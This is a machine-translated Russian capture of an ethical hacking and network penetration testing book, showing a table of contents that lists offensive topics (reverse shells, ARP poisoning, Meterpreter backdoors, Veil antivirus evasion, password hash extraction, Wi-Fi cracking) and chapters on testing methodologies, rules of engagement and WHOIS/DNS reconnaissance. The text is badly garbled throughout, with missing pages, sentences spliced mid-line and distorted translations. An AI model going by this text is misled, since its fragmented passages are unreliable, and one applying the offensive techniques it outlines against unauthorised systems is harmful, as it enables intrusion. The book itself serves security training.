Открыть Электронные книги
Категории
Открыть Аудиокниги
Категории
Открыть Журналы
Категории
Открыть Документы
Категории
Страница 1
Страница 2
Оглавление
Глава 01 Введение в тестирование на проникновение в сеть
Определение и цель
Информационная безопасность
Уязвимость, угроза и использование
Оценка рисков и анализ воздействия
Типы и категории тестирования на проникновение
Методологии и стандарты
Руководство по методологии тестирования безопасности с открытым исходным кодом (OSSTMM)
Стандарт выполнения тестирования на проникновение (PTES)
Техническое руководство по тестированию и оценке информационной безопасности NIST
(Национальный институт стандартов и технологий)
Фреймворк тестирования на проникновение
Руководство по тестированию Open Web Application Security Project (OWASP)
Модуль 02 Подготовка к вступлению в бой.
Объем и анкета
Критерий успеха
Правила участия
Модуль 03 Сбор разведданных.
Типы сбора разведданных
Типы собираемой информации
Уровни сбора разведданных
Практические методы
Ручной анализ веб-сайта
Доступ к информации WHOIS
Региональные интернет-реестры (RIR)
Реестры доменов
Инструмент командной строки WHOIS
Онлайн-WHOIS
Записи DNS
Запрос DNS-записей
Подбор DNS-имени
Перенос зоны DNS
Публичная поисковая система
Стр. 3
https://translate.googleusercontent.com/translate_f 1/242
09.10.2021, 18:33 Сетевой этический взлом и тестирование на проникновение
RobTex - механизм поиска DNS
BuiltWith - интеллектуальный анализ веб-технологий
Netcraft - веб-анализатор
Как найти в Интернете незащищенные конфиденциальные файлы вашей цели
Запрос файлов документов в Google
Автоматический поиск и анализ документов с помощью «Metagoofil»
Инструмент Maltego
Бег и изучение Мальтего
Получение информации с помощью преобразований
Более глубокий взгляд на сущности и преобразования
Модуль 04 Управление сетевым трафиком.
Анализ сетевого трафика
Tcpdump
Wireshark
Перехват сетевого трафика
Концентратор против коммутатора
Отравление ARP
Arpspoof
Связывание и обратная оболочка с Netcat
Обзор
Войдите в Netcat
Привязать оболочку
Обратная оболочка
Резюме
Взлом SSL / TLS с использованием SSLstrip
Перенаправление HTTP 302
Использование 302 редиректа
Запуск SSLstrip
Заключительные примечания
Модуль 05 Сетевое и системное сканирование.
Вступление
Обнаружение хоста
Методы на основе ICMP
Стр. 4
https://translate.googleusercontent.com/translate_f 2/242
09.10.2021, 18:33 Сетевой этический взлом и тестирование на проникновение
Уязвимости
Уязвимости авторизации
доступности
Уязвимости оборудования
Отслеживание и рейтинг уязвимостей
Система Common Vulnerabilities and Exposures (CVE)
Общая система оценки уязвимостей (CVSS)
Базы данных об уязвимостях в Интернете
Автоматические сканеры уязвимостей
Сканер безопасности Nessus
Установка Nessus
Шаблоны сканирования
Настройка нового сканирования
Сканирование Metasploitable System
Модуль 07 Эксплуатация
Вступление
Последствия эксплуатации
Удаленное выполнение кода (RCE)
Повышение привилегий
Раскрытие информации
Стр. 5
https://translate.googleusercontent.com/translate_f 3/242
09.10.2021, 18:33 Сетевой этический взлом и тестирование на проникновение
Как использовать Meterpreter
Первый метод: Meterpreter как полезная нагрузка
Второй способ: Meterpreter как исполняемый файл
Постэксплуатация с помощью Meterpreter
Получение информации
Стр. 6
Повышение привилегий
Покрытие следов
Взаимодействие с операционной системой
Взаимодействие с файловой системой
Постоянный бэкдор
Поворотные механизмы и реле для экстремального постэксплуатационного контроля
Переход через первую жертву
Рассказывая о первой жертве
Уклонение от антивирусного ПО с Veil Framework
Вступление
Путь уклонения
Войдите в завесу
Установка Veil Framework
Бегущая вуаль
Понимание полезной нагрузки Veil
Генерация троянца
Начало атаки
Оценка антивирусной защиты
Оценка полезной нагрузки Veil
Модуль 09 Парольные атаки.
Вступление
Советы по парольным атакам
Типы парольных атак
Подбор пароля
Взлом паролей
Подбор пароля с помощью xHydra
Хэши паролей Windows
Формат хеширования LM
Формат NT Hash
Взлом хэшей Windows с помощью Cain
Извлечение хэшей паролей домена
Копирование базы данных NTDS
Экспорт информации из базы данных NTDS
Извлечение хэшей из таблиц данных и ссылок
Хэши паролей Linux
Алгоритмы хеширования в Linux
Использование солей
Стр.7
Итерации хеширования
https://translate.googleusercontent.com/translate_f 4/242
09.10.2021, 18:33 Сетевой этический взлом и тестирование на проникновение
Взлом хэшей Linux с помощью Джона
Модуль 10 Беспроводные атаки.
Вступление
Беспроводная технология
Режимы работы WLAN
Наборы услуг и их идентификация
Режимы беспроводной карты
Беспроводная безопасность
Беспроводные DoS-атаки
Wired Equivalent Privacy (WEP) и его недостатки
Защищенный доступ Wi-Fi (WPA 1 и 2)
Инструмент Aircrack-NG
Взлом WEP с помощью aircrack-ng
Взлом WPA1 и 2 с помощью aircrack-ng
Стр. 8
https://translate.googleusercontent.com/translate_f 5/242
09.10.2021, 18:33 Сетевой этический взлом и тестирование на проникновение
Тестирование на проникновение показывает, что и как хакеры могут скомпрометировать или
повредить определенный компьютер или сетевую систему. Путем проникновения
test, целевая организация узнает:
Информационная безопасность
Любой бизнес полагается на информацию, такую как коммерческая тайна, данные клиентов,
финансовые документы, документы сотрудников, электронные письма и т. д. Информация
Безопасность - это сохранение конфиденциальности , целостности и доступности
(ЦРУ) деловой информации:
Стр.9
https://translate.googleusercontent.com/translate_f 6/242
09.10.2021, 18:33 Сетевой этический взлом и тестирование на проникновение
они знают алгоритм шифрования. «Ключ» должен быть
известная стороне, расшифровывающей зашифрованный текст. Примеры
алгоритмов шифрования - DES, AES и RSA.
б. Хеширование / цифровая подпись : хеширование используется для сохранения
целостность информации; и это процесс
создание уникального отпечатка пальца (строки) фиксированной длины
Стр.10
Стр. 11
https://translate.googleusercontent.com/translate_f 7/242
09.10.2021, 18:33 Сетевой этический взлом и тестирование на проникновение
Стр. 12
1. Обязательства руководства
Руководство должно знать о киберугрозах и обязано совершать
для защиты своей деловой информации. Роли верхних
управление можно резюмировать в следующих пунктах:
https://translate.googleusercontent.com/translate_f 8/242
09.10.2021, 18:33 Сетевой этический взлом и тестирование на проникновение
2. Техническая реализация
ИТ-подразделение компании должно уметь технически реализовать
различные технологии безопасности, такие как:
Антивирус.
Межсетевой экран.
Система обнаружения / предотвращения вторжений (IDS / IPS).
Демилитаризованная зона (DMZ).
VLAN.
Инфраструктура открытых ключей (PKI).
Единое управление угрозами (UTM).
3. Сторонняя оценка
Сторонние аудиторы и тестеры на проникновение должны быть наняты на регулярной основе.
интервалы для проверки безопасности компании. Выгоды
стороннего аудита и тестирования на проникновение:
Стр. 13
Есть три термина, которые часто повторяются в лексиконе этического взлома; а также
это уязвимость, угроза и эксплойт. Очень важно понять
эти термины и знайте разницу между ними.
Допустим, есть дом, в котором есть что-то ценное, но дверь в него закрыта.
слабая блокировка. В таком сценарии слабую блокировку можно назвать уязвимостью,
вор, который может проникнуть в дом, будет угрозой, а отмычка
или инструмент, используемый вором для взлома слабой блокировки, можно назвать эксплойтом.
Оценка рисков и анализ воздействия
Когда дело доходит до информационной безопасности в любом бизнесе, всегда есть
вопрос, сколько инвестировать, чтобы уменьшить и закрыть уязвимости. Потому что,
Стр. 14
более высокая безопасность потребует большего бюджета; таким образом, исполнительное руководство
Спросили бы, сколько бюджета необходимо для достижения желаемой безопасности?
А для правильного ответа проводятся дополнительные оценки.
нужный. Недостаточно простой оценки уязвимости. Бизнесу нужно
для проведения этих двух процессов:
Стр. 15
https://translate.googleusercontent.com/translate_f 10/242
09.10.2021, 18:33 Сетевой этический взлом и тестирование на проникновение
Стр.16
https://translate.googleusercontent.com/translate_f 11/242
09.10.2021, 18:33 Сетевой этический взлом и тестирование на проникновение
локальной сети организации (LAN), либо он может находиться где угодно
в противном случае за пределами локальной сети цели и проведите тест через Интернет.
Соответственно, тест на проникновение может быть внешним или внутренним тестом.
Итак, внешний тест на проникновение проводится через Интернет и оценивает
Интернет-присутствие цели. То есть этичный хакер пытается
взламывают цель через их общедоступные - выходящие в Интернет - системы. Это
имитирует внешних хакеров, которые могут находиться в любой точке мира. An
Внешний тест обычно оценивает такие системы, как:
DNS-серверы
Веб-серверы (http / https)
Файловые (ftp) серверы
Серверы удаленного доступа (citrix / rdp / ssh)
Почтовые (smtp / imap / pop3) серверы
Маршрутизаторы и VPN-шлюзы
Межсетевые экраны и IDS / IPS
С другой стороны, внутренний тест на проникновение проводится из местного
периметр целевой организации. И в первую очередь имитирует взлом
процесс злонамеренного инсайдера, то есть сотрудника или подрядчика, который
предполагается, что организация доверяет, но имеет злонамеренный умысел. Этот тип
Тест на проникновение обычно включает в себя следующие действия:
Стр.17
Методологии и стандарты
Чтобы стандартизировать процесс тестирования на проникновение, разные
организации создали комплексные методологии, описывающие все
шаги и этапы пен-тестирования. Эти методологии и стандарты обеспечивают
рамки для тестировщиков на проникновение, которым они должны следовать во время своей работы, чтобы тест
является исчерпывающим и полным. Также эти методологии и стандарты
предоставить целевым организациям знания для оценки глубины и
точность стороннего теста на проникновение. Таким образом, методики помогают как
этичный хакер, а также цель получить максимальную отдачу от теста на проникновение.
В этой главе мы рассмотрим пять различных методологий и стандартов:
https://translate.googleusercontent.com/translate_f 12/242
09.10.2021, 18:33 Сетевой этический взлом и тестирование на проникновение
Руководство по методологии тестирования безопасности с открытым исходным кодом (OSSTMM)
www.isecom.org/research
Стр.18
https://translate.googleusercontent.com/translate_f 13/242
09.10.2021, 18:33 Сетевой этический взлом и тестирование на проникновение
Стр.19
Стр.20
https://translate.googleusercontent.com/translate_f 14/242
09.10.2021, 18:33 Сетевой этический взлом и тестирование на проникновение
Это включает в себя подготовительные беседы и общение между
вы, тестировщик проникновения и целевая организация. Эти
взаимодействия включают в себя: Объем - Встречи - Анкета - Цели -
Контактная информация для экстренных случаев - Правила взаимодействия.
2. Сбор разведданных
Согласно PTES, этот этап предполагает работу за кулисами, чтобы
сформировать подробное представление о целевой организации; такой подробный
картинка даст вам лучшее и более глубокое понимание цели.
Этот этап включает в себя выполнение таких задач, как разведка и
Следы ( обсуждается позже ) против цели, чтобы собрать как можно больше
информация по мере возможности. Информация будет большим подспорьем в дальнейшем.
фазы - оценка уязвимости и эксплуатация. Таким образом, чем больше
информацию, которую вы собираете здесь, тем больше атакующих стратегий вы будете использовать
позже.
3. Моделирование угроз
На этом этапе необходимо определить два ключевых элемента: 1. Активы и 2.
Угрозы. Активы - это системы и / или приложения, принадлежащие
цель, в то время как угрозы - это опасности, которые потенциально могут повредить или
поставить под угрозу активы. Моделирование угроз выполняется в четыре этапа:
Стр.21
5. Эксплуатация
Согласно PTES, основной упор на этом этапе делается на получение
доступ к системам или ресурсам путем прохождения ограничений безопасности. А также
этот этап должен быть «хорошо спланированным и точным», если
предыдущий этап - анализ уязвимостей - прошел успешно.
Фаза эксплуатации направлена на создание точек входа в
системы цели и идентифицируйте цели с высокой ценностью. Ваша цель как
Тестер на проникновение должен вызывать наибольшее воздействие. Таким образом, вам следует
сфокусироваться на векторах атаки с высокой вероятностью успеха и сильным воздействием.
6. Постэксплуатация
После успешной эксплуатации ваша цель - сохранить доступ к
система цели на длительный период времени. Также, по данным ПТЭС, вы
следует определить ценность системы, проверив чувствительность
данные, хранящиеся на нем, и насколько система полезна для взлома
глубже в сеть.
https://translate.googleusercontent.com/translate_f 15/242
09.10.2021, 18:33 Сетевой этический взлом и тестирование на проникновение
7. Отчетность
Заключительный этап - это написание отчета, описывающего весь процесс,
вместе со всеми находками и решениями. Отчет должен быть написан
способ, который имеет смысл для клиента и обеспечивает его максимальную
ценить.
Техническое руководство по тестированию и оценке информационной безопасности, проведенное
NIST ( Национальный институт стандартов и технологий )
nvlpubs.nist.gov/nistpubs/Legacy/SP/nistspecialpublication800-115.pdf
Стр. 22
а. Планирование :
Этот этап включает в себя подготовительные действия, встречи и
беседы с клиентом. В основном он должен охватывать
следующие аспекты:
я. Сбор информации.
II. Сканирование.
iii. Анализ уязвимости.
c. Атака :
Это этап выполнения плана атаки. Эта фаза раскрывает все
вред, с их доказательствами, который может быть нанесен цели.
Согласно руководству, этот этап включает четыре основных действия:
я. Получение доступа
II. Повышение привилегий
iii. Просмотр системы
iv. Установка инструментов
d. Составление отчетов
Последний этап - написание отчета, в котором объясняется все, что было
сделано, включая выводы, стратегии смягчения и решения.
Фактическое время доставки отчета согласовывается во время
первый этап, этап планирования.
Фреймворк тестирования на проникновение
www.vulnerabilityassessment.co.uk
https://translate.googleusercontent.com/translate_f 16/242
09.10.2021, 18:33 Сетевой этический взлом и тестирование на проникновение
Стр. 23
Стр. 24
https://translate.googleusercontent.com/translate_f 17/242
09.10.2021, 18:33 Сетевой этический взлом и тестирование на проникновение
Проникновение : в этом разделе рассматриваются необходимые инструменты и методы.
выполнить этап эксплуатации. Эксплуатация - это процесс
использование уязвимостей, чтобы получить доступ или вызвать
отказ в обслуживании (DoS). Основные инструменты, описанные в этом разделе
являются Metasploit, Core Impact, Cisco Global Exploiter и
ХОЛСТ.
Специфичный для сервера тест : в этом разделе фреймворк
шаги для оценки четырех типов серверов: баз данных, почтовых серверов, веб-
серверы и серверы VPN. Для каждого вида он снабдит вас
инструменты и методы для обнаружения, перечисления, сканирования и проникновения
система.
Безопасность VoIP : это тяжелый раздел, полный инструментов для выполнения
следующие действия против протокола и систем VoIP: сниффинг,
сканирование и перечисление, создание пакетов и лавинная рассылка, фаззинг,
сигнальные манипуляции, манипуляции со СМИ и другие.
Беспроводное проникновение : этот раздел посвящен оценке беспроводного
сети (WLAN). Он предоставляет вам методы и инструменты для
открыть для себя беспроводные сети, получить подробные сведения об их
спецификации, взломать их пароли и т. д.
Физическая безопасность : в этом разделе приведено пошаговое
план действий по оценке физической безопасности целевой организации.
Оценка проводится в отношении конференц-залов, вестибюля, общего
площадь, общие комнаты, окна, забор, входные двери и все входы
точки.
Стр.25
https://translate.googleusercontent.com/translate_f 18/242
09.10.2021, 18:33 Сетевой этический взлом и тестирование на проникновение
Проверка подлинности : проверка подлинности - это процесс проверки
цифровую идентификацию пользователя, чтобы разрешить или запретить доступ к
вся система. Самый распространенный способ аутентификации - через
использование паролей. Этот этап включает в себя проверку того, насколько безопасен
процесс аутентификации.
Проверка авторизации: авторизация - это процесс проверки
привилегии аутентифицированного пользователя для предоставления доступа к
конкретный ресурс; это происходит после успешной аутентификации. Этот
фазовые тесты на возможность повышения или обхода привилегий
правила авторизации.
Тестирование управления сеансом : Управление сеансом - это
механизм, с помощью которого [веб-приложение] контролирует и поддерживает
состояние для пользователя, взаимодействующего с ним ». На этом этапе проверяется сила
Стр. 26
https://translate.googleusercontent.com/translate_f 19/242
09.10.2021, 18:33 Сетевой этический взлом и тестирование на проникновение
Стр. 27
Объем и анкета
Объем определяет, что тестировать, когда тестировать, где тестировать и как тестировать.
Тестировщик на проникновение не должен участвовать в тестировании без четко определенной области.
Согласование четко определенной области - самый важный шаг на
начало теста. Со стороны тестировщика вы будете участвовать в тестировании
точно зная, что вы собираетесь оценивать, в какое конкретное время и
откуда. Вы будете защищены законом до тех пор, пока это не сделает ваш тест.
не пересекать границы области применения. Со стороны клиента они будут знать
за что они будут платить в финансовом отношении; это предотвратит перезарядку.
Объем должен быть определен и обсужден на встрече между
тестировщик и клиент. И он должен охватывать следующие аспекты:
Стр.28
Стр.29
https://translate.googleusercontent.com/translate_f 21/242
09.10.2021, 18:33 Сетевой этический взлом и тестирование на проникновение
Критерий успеха
Одна из ваших ролей тестера на проникновение на начальном этапе - объяснять
клиенту, что термин «взлом» имеет общий смысл, и измеряет
успешный «взлом» всегда зависит от бизнес-контекста
цель. Часто клиент хочет знать, работает ли его инфраструктура
Стр.30
«Взломанный» или «безопасный». Но что представляет собой успешный взлом ? Один клиент
может считать отказ в обслуживании (DoS) на несколько часов успешным взломом,
в то время как другого может вообще не беспокоить такой инцидент. Вот почему это
важно понимать, чего ожидает клиент от теста, и как
они просматривают случаи взлома.
Rapid7, крупная консалтинговая компания по вопросам безопасности, разработала модель для
определить и разработать критерии успеха; они назвали свою модель умнее ,
что является аббревиатурой от « Конкретный , измеримый , достижимый , релевантный» , « Время».
связаны , оценивать и переоценивать . Ниже приведены описания и
примеры для модели SMARTER:
Стр.31
Правила участия
OSSTMM предоставляет около 40 правил взаимодействия. Некоторые из самых
важные из них:
A. Продажи и маркетинг :
Использование страха, неуверенности, сомнений и обмана не может быть использовано в продажах.
или маркетинговые презентации, веб-сайты, вспомогательные материалы, отчеты или
обсуждение тестирования безопасности с целью продажи или обеспечения безопасности
тесты. Это включает, но не ограничивается указанием преступлений, фактов, прославленных
профили преступников или хакеров, а также статистика для мотивации продаж.
Предложение бесплатных услуг за невозможность проникновения в цель запрещено.
Открытые конкурсы по взлому, взлому и вторжению в целях обеспечения безопасности
для продажи или
маркетинг продуктов для тестирования безопасности или безопасности запрещен.
Стр.32
https://translate.googleusercontent.com/translate_f 23/242
09.10.2021, 18:33 Сетевой этический взлом и тестирование на проникновение
требуется
информациядляиобеспечения конфиденциальности и неразглашения информации о клиенте
результаты испытаний.
Контракты должны четко объяснять пределы и опасности проверки безопасности, поскольку
часть технического задания.
В случае удаленного тестирования в контракте должно быть указано происхождение
Аналитики по адресу, номеру телефона или IP-адресу.
Клиент должен предоставить подписанное заявление, в котором проводится тестирование.
разрешение, освобождающее Аналитиков от посягательства в пределах области, и
возмещает ответственность за счет стоимости аудиторских услуг, за исключением случаев, когда
доказана вредоносная активность.
В контрактах должны быть указаны имена и номера телефонов для связи в экстренных случаях.
D. Определение объема :
Объем должен быть четко определен в контракте, прежде чем проверять уязвимость.
Сервисы.
E. План тестирования :
План тестирования не может содержать планы, процессы, методы или процедуры.
которые выходят за рамки области знаний или уровня компетенции Аналитика.
F. Процесс тестирования :
Аналитик всегда должен действовать в соответствии с законом места (мест).
целей в дополнение к правилам или законам, регулирующим тестирование аналитика
место нахождения.
Если необходимо для привилегированного тестирования, клиент должен предоставить два отдельных
токены доступа, будь то пароли, сертификаты, безопасные идентификационные номера,
значки и т. д., и они должны быть типичными для пользователей с привилегиями,
проверенные, а не особенно пустые или безопасные доступы.
Если тестирование включает известные привилегии, аналитик должен сначала протестировать без
привилегии (например, в среде черного ящика) перед повторным тестированием с
привилегии.
Аналитики должны знать свои инструменты, откуда они взялись,
как работают инструменты, и протестируйте их в ограниченной тестовой зоне, прежде чем
с помощью инструментов организации-клиента.
Проверенные ограничения, такие как обнаруженные нарушения, уязвимости с
известные или высокие уровни эксплуатации, уязвимости, которые можно использовать для
полный, неконтролируемый или неотслеживаемый доступ, или который может немедленно
об опасности для жизни, обнаруженной во время тестирования, необходимо сообщить заказчику
практическим решением, как только они будут найдены.
Аналитик не может оставлять прицел в состоянии менее реальной безопасности.
чем было, когда это было предусмотрено.
Стр. 33
https://translate.googleusercontent.com/translate_f 24/242
09.10.2021, 18:33 Сетевой этический взлом и тестирование на проникновение
документы илиозначают
След. Все они онлайн-руководства,
одно и то же.которые называют эту фазу просто разведкой или
Цель этапа сбора разведданных - получить подробную картину
о цели, чтобы вы могли построить свой план атаки. Собравшиеся
информация раскроет закономерности о людях, цифровых системах и / или
физическое расположение, здания и оборудование целевой организации.
Имейте в виду, что многие организации не понимают, как общественность
информация, которую они раскрывают о себе, может быть использована хакером. Также,
многие сотрудники не обращают внимания на личную информацию, которую они
разглашают в Интернете, и они не знают, как эта информация может быть использована
хакеры, чтобы навредить им.
Типы сбора разведданных
Есть два основных типа сбора разведданных:
Стр. 34
Стр. 35
Стр.36
https://translate.googleusercontent.com/translate_f 26/242
09.10.2021, 18:33 Сетевой этический взлом и тестирование на проникновение
PCI-DSS (Индустрия платежных карт - Стандарт безопасности данных),
FISMA (Федеральный закон об управлении информационной безопасностью), ISO
27001, HIPAA (Переносимость и подотчетность медицинского страхования
Act) и т. Д. Требуется минимум времени и усилий для выполнения
по сравнению с другими уровнями. Информация, которую вы здесь собираете, будет
быть минимальным, но достаточным для проведения успешного стандарта
тест на проникновение. Кроме того, вы должны быть в состоянии достичь этого уровня
используя различные автоматизированные инструменты, такие как Maltego, которые мы будем
позже в этой главе.
2. Уровень 2 сбора интеллекта : этот уровень требуется, когда вы
клиент хочет выйти за рамки простого соблюдения нормативных требований. Они
может быть заинтересован в применении информационной безопасности отраслевого уровня
передовой практики, и они озабочены своим долгосрочным
политика информационной безопасности. И они готовы платить больше за
пройти более глубокий и тщательный тест на проникновение. В этом сценарии вы
потратит больше времени на ручной анализ собранной информации
через автоматизированные инструменты. Этот дополнительный ручной анализ будет
дать вам лучшее понимание бизнеса вашего
клиент.
3. Уровень 3 сбора интеллекта : этот уровень обычно требуется
спонсируемые государством (правительственные) операции, например, когда одна страна
хочет вести кибервойну против другого. Если ты
поставленной перед такой операцией, ваша атака должна быть настолько глубокой и
как можно полнее. Для сбора информации на этом уровне необходимо получить
Информация уровня 1 и уровня 2 в первую очередь; тогда вам нужно провести
тяжелый анализ. Это может потребовать развития отношений в социальных сетях.
СМИ с фальшивыми личностями, проанализируйте психологию своего
таргетировать людей с помощью анализа почерка, анализа текста, тела
языковой анализ, анализ мимики и т. д. Такие глубокие
информация может очень помочь на этапе взлома пароля,
фишинговые атаки, установка бэкдоров и т. д.
Практические методы
Стр. 37
Стр. 38
знать физическое местоположение вашей цели. Это может помочь вам позже
чтобы нарушить их физическую безопасность или обнюхать их беспроводные сети
вне периметра.
4. Найдите все деловые связи и партнеров. На протяжении всего вашего анализа
убедитесь, что вы заметили все другие организации и компании, которые
ваша цель имеет дело с.
5. Поищите новости в Интернете, чтобы найти последние новости о вашем
организация; вы должны быть в курсе их последних приобретений,
слияния, дочерние компании и т. д.
6. Запишите ссылки, которые у них есть на другие связанные сайты. Ваша цель
веб-сайт может содержать гиперссылки на другие предприятия; это важно
принять к сведению это, поскольку другие сайты могут также раскрыть больше
информация о вашей цели.
Стр. 39
Стр. 40
Штаб-квартира: Маврикий.
https://translate.googleusercontent.com/translate_f 29/242
09.10.2021, 18:33 Сетевой этический взлом и тестирование на проникновение
Веб-сайт: https://www.afrinic.net
Кто Интернет Интерфейс:
https://www.afrinic.net/services/whois-query
Сервер Whois: whois.afrinic.net
2. Американский реестр интернет-номеров (ARIN)
В основном отвечает за Северную Америку.
Штаб-квартира: США
Веб-сайт: https://www.arin.net/
Веб-интерфейс Whois: https://whois.arin.net/ui/
Сервер Whois: whois.arin.net
3. Азиатско-тихоокеанский сетевой информационный центр (APNIC)
Отвечает за большую часть Азии - в основном Восточную Азию,
Южная Азия и Юго-Восточная Азия - и для Океании.
Штаб-квартира: Австралия
Веб-сайт: https://www.apnic.net/
Кто Интернет Интерфейс:
http://wq.apnic.net/static/search.html
Сервер Whois: whois.apnic.net
4. Сетевой информационный центр Латинской Америки и Карибского бассейна
(ЛАКНИК)
Отвечает за Латинскую Америку и Карибский бассейн.
Штаб-квартира: Уругвай.
Веб-сайт: https://www.lacnic.net/
Веб-интерфейс Whois: https://rdap-web.lacnic.net
Сервер Whois: whois.lacnic.net
5. Координационный центр сети Réseaux IP Européens (RIPE
NCC)
Отвечает за Европу, Россию, Среднюю Азию и Запад
Азия.
Штаб-квартира: Нидерланды
Веб-сайт: https://www.ripe.net/
Веб-интерфейс Whois: https://apps.db.ripe.net/db-web-
ui / # / query
Сервер Whois: whois.ripe.net
Стр. 41
https://translate.googleusercontent.com/translate_f 30/242
09.10.2021, 18:33 Сетевой этический взлом и тестирование на проникновение
домены, а такжекоторым
о регистрантах, домены второго уровня.эти
принадлежали Информация включает
домены второго данные
уровня. В отличие от RIR,
которые содержат информацию в основном о назначении IP-адреса, домене
реестры в основном занимаются информацией о доменах. Таким образом, информация
о semurity.com может храниться в реестре (реестре домена), который
отличается от реестра (RIR), содержащего информацию об IP-адресе
170.10.163.106, который является IP-адресом веб-сервера, связанного с
semurity.com.
Ниже приведены два наиболее важных реестра доменов:
Стр. 42
Стр. 43
Сервер WHOIS.
Давайте теперь проверим это, связавшись напрямую с сервером whois.internet.bs . В
Команда whois предоставляет ключ (-h), чтобы мы могли вручную указать
сервер WHOIS, с которым мы хотим связаться. И когда мы вручную указываем
сервер, мы переопределяем конфигурацию инструмента, и он не будет связываться
whois.verisign-grs.com .
# whois -h whois.internet.bs semurity.com
Доменное имя: SEMURITY.COM
Идентификатор домена реестра: 2137264567_DOMAIN_COM-VRSN
Сервер WHOIS регистратора: whois.internet.bs
URL регистратора: http://www.internetbs.net
Дата обновления: 2018-09-30T19: 39: 08Z
Дата создания: 2017-06-26T10: 08: 15Z
Дата истечения срока регистрации регистратора: 2019-06-26T10: 08: 15Z
Регистратор: Internet Domain Service BS Corp.
IANA ID регистратора: 2487
Контактный адрес электронной почты регистратора по вопросам злоупотреблений: abuse@internet.bs
Контактный телефон регистратора по вопросам злоупотреблений: +1.5167401179
Торговый посредник:
Статус домена: clientTransferProhibited - http://www.icann.org/epp#clientTransferProhibited
Идентификатор регистранта реестра:
Имя регистранта: Не разглашается Не разглашается
Организация регистранта:
Улица регистранта: не раскрывается, не раскрывается, не раскрывается
Город регистрации: не разглашается
Штат / провинция регистранта:
Почтовый индекс регистранта: 00000
Страна регистрации: LB
Телефон регистранта: +1.5163872248
Телефон регистранта, доб .:
Факс регистранта:
Факс регистранта, внутр .:
Электронная почта регистранта:
8d31e2253b551fc0532a78e730c803d3.gdrp@customers.whoisprivacycorp.com
ID администратора реестра:
Имя администратора: Не разглашается Не разглашается
Административная организация: Supple Networks
Админ-стрит: Ахрафие, Бейрут
Админ Город: Бейрут
Административный штат / провинция:
Почтовый индекс администратора: 961
Страна администратора: LB
Телефон администратора: +1.5163872248
Телефон администратора, внутр .:
Факс администратора:
Стр.44
https://translate.googleusercontent.com/translate_f 32/242
09.10.2021, 18:33 Сетевой этический взлом и тестирование на проникновение
Стр.45
https://translate.googleusercontent.com/translate_f 33/242
09.10.2021, 18:33 Сетевой этический взлом и тестирование на проникновение
на основе интерфейса. Вот несколько таких:
1. https://www.whois.com/whois/
2. https://www.whois.net
3. https://whois.icann.org/en
Стр. 46
Записи DNS
Еще одна область, на которой вам следует сосредоточиться во время сбора разведданных
фаза - это данные DNS. На предыдущем этапе, WHOIS, мы получили информацию
о доменном имени; теперь нам нужно знать, какие системы подпадают под это
домен и их полные доменные имена - полные доменные имена - и IP
адреса есть.
DNS (система доменных имен) - это протокол прикладного уровня в
Платформа TCP / IP. Он использует порт 53 и может работать через UDP или TCP. Самый
Трафик DNS в Интернете проходит через UDP, а DNS через TCP зарезервирован для
определенные административные операции (обсуждаются позже). Это клиент-сервер
протокол, в котором клиент отправляет сообщение запроса, а сервер отвечает
с ответом. Основная цель протокола DNS - разрешить имена хостов в
их IP-адреса. Поскольку нам трудно запомнить IP-адрес каждого
сервер, к которому мы хотим получить доступ, или браузер, DNS упрощает нам задачу, отображая
IP-адреса на удобные имена; тогда нам нужно запомнить эти имена -
например, www.semurity.com, www.google.com, www.apple.com и т. д.
В Интернете DNS-серверы имеют иерархическую структуру. В верхней части
В иерархию входят так называемые корневые DNS-серверы; после них идет DNS
серверы, отвечающие за домены верхнего уровня (TLD), такие как, .com, .net,
.org, .gov и т.д .; а затем, после DNS-серверов TLD, идут DNS-серверы
https://translate.googleusercontent.com/translate_f 34/242
09.10.2021, 18:33 Сетевой этический взлом и тестирование на проникновение
отвечает за домены второго уровня, например, semurity.com,
google.com и apple.com. И эти серверы несут ответственность за дальнейшее
поддомены и для имен хостов в этих доменах второго уровня, таких как
как, www.semurity.com, www.google.com и www.apple.com.
Стр. 47
Стр. 48
https://translate.googleusercontent.com/translate_f 35/242
09.10.2021, 18:33 Сетевой этический взлом и тестирование на проникновение
Запрос DNS-записей
Существуют различные инструменты, которые позволяют нам взаимодействовать с DNS-сервером и
запрашивать определенные записи. В системах UNIX / Linux у нас есть dig и host
tools, а в Windows - nslookup. В следующих разделах объясняется
вкратце, как использовать dig и host для получения различных записей DNS.
копать землю
Стр. 49
<type> может быть одним из типов DNS-записей, указанных выше (A, AAA,
CNAME, MX, NS, PTR, SRV, TXT или SOA); это вернет конкретный
записи этого типа, связанные с <hostname>. Вот несколько
https://translate.googleusercontent.com/translate_f 36/242
09.10.2021, 18:33 Сетевой этический взлом и тестирование на проникновение
Примеры:
# dig A semurity.com
# dig AAAA semurity.com
# dig CNAME semurity.com
# dig MX semurity.com
# dig NS semurity.com
# dig SOA semurity.com
Кроме того, для <type> можно задать значение ANY, например: #dig SOA semurity.com . А также
это вернет все записи, связанные с <hostname> вместо запроса
их тип по типу. Использование ЛЮБОГО не означает, что вы получите все
записи во всей доменной зоне, а только те записи, которые связаны
с любым именем хоста, которое вы указали. <hostname> может быть доменом
имя, например semurity.com или google.com . Однако вы получите записи
связанный с этим доменным именем; таким образом, записи, связанные с именем хоста
например, webmail.semurity.com не будет возвращен, если вы отправите запрос с
Любой тип.
Давайте посмотрим на вывод команды dig:
$ dig a semurity.com
Стр.50
;; РАЗДЕЛ ВОПРОСА :
; semurity.com. В А
;; ОТВЕТНАЯ ЧАСТЬ :
semurity.com. 8398 В А 170.10.163.106
;; РАЗДЕЛ ВЛАСТИ :
semurity.com. 166798 В NS dns2.supremepanel.com.
;; ДОПОЛНИТЕЛЬНЫЙ РАЗДЕЛ :
dns1.supremepanel.com. 166798 В А 162.210.102.178
dns2.supremepanel.com. 166798 В А 198.23.61.128
https://translate.googleusercontent.com/translate_f 37/242
09.10.2021, 18:33 Сетевой этический взлом и тестирование на проникновение
IP-адреса NS-серверов включены в Дополнительный раздел.
хозяин
Эта команда проще, чем dig, и предназначена в первую очередь для разрешения
имена в IP-адреса и наоборот. В то время как dig выводит четыре раздела
ответ DNS, хост печатает только ответ. И это делает его привлекательным, если
вы ищете аккуратный прямой выход. Также по умолчанию он связывается с DNS.
серверы, перечисленные в файле /etc/resolv.conf. Тем не менее, это также дает вам возможность
указать DNS-сервер вручную. Вот простой способ использования хоста:
# host -t <тип> <имя хоста>
Стр. 51
# host -t mx google.com
Почта google.com обрабатывается 40 alt3.aspmx.l.google.com.
Почтой google.com занимается 10 aspmx.l.google.com.
Почта google.com обрабатывается 30 alt2.aspmx.l.google.com.
